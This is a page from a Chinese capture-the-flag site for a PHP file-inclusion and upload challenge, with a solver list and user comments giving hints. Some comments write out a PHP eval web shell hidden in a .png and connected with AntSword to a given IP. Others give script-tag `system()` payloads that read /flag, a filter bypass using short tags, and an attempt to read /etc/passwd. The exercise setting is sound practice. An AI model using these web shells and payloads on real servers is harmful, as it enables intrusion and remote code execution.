评分(5)
解题动态
雪子且飞机 攻破了该题 23小时前
马博文 攻破了该题 1天前
igrazee 攻破了该题 1天前
qsy 攻破了该题 1天前
liang123456 攻破了该题 1天前
minz 攻破了该题 1天前
白菜白又白 攻破了该题 2天前
15016808949 攻破了该题 2天前
bhcxzhdsa 攻破了该题 2天前
鲲中霸王 攻破了该题 3天前
out不慢 攻破了该题 4天前
sunshb07 攻破了该题 4天前
zrc2682 攻破了该题 5天前
15248665739 攻破了该题 6天前
19834403913 攻破了该题 6天前
Blmn 攻破了该题 7天前
帅帅123 攻破了该题 7天前
ixin 攻破了该题 8天前
tutuyeye 攻破了该题 8天前
评论
你能刑 3年前
举报
包含/flag就行
树木有点绿 3年前
举报
无脑/flag直接获得flag哈哈哈
青蛙骑士 3年前
举报
别卷了阿财
liln0te 4年前
举报
看了源码 这里屏蔽了伪协议,文件上传过滤了<?php 和 ?> 这两个 后面那个基本现在都不用了 短标签 `<?=`,`<?` script标签也可以
lysr 4年前
举报
桌面新建文本文档然后输入:<script language="php">@eval($_POST[pass])</script> 再重命名为xx.png,上传之后用中国蚁剑连http://114.67.246.176:16116/index.php?file=upload/202111161218016371.png,显示连接成功
lysr 4年前
举报
桌面新建文本文档然后输入:<script language="php">@eval($_POST[pass])</script> 再重命名为xx.png,上传之后用中国蚁剑连http://114.67.246.176:16116/index.php?file=upload/202111161218016371.png,显示连接成功
109张某 2年前
举报
大佬,中国蚁剑怎么连上的哦,他从服务器端直接过滤了php,直接就把最基本的连接类型阻断了,抓包也不能修改php类型
admin138798 4年前
举报
将<script language=php>system("cat /flag")</script>写成jpg文件上传直接访问就有flag了
狐萝卜CarroT 4年前
举报
什么意思,直接改成/flag就出来了
zxmals 4年前
举报
我这运气 file:///etc/passwd
wINFerno 4年前
举报
这题目我使用蚁剑连接不上,就写了<script language="php" >system('ls -al /')</script>查看目录 <script language="php" >system('tac /flag')</script>找到flag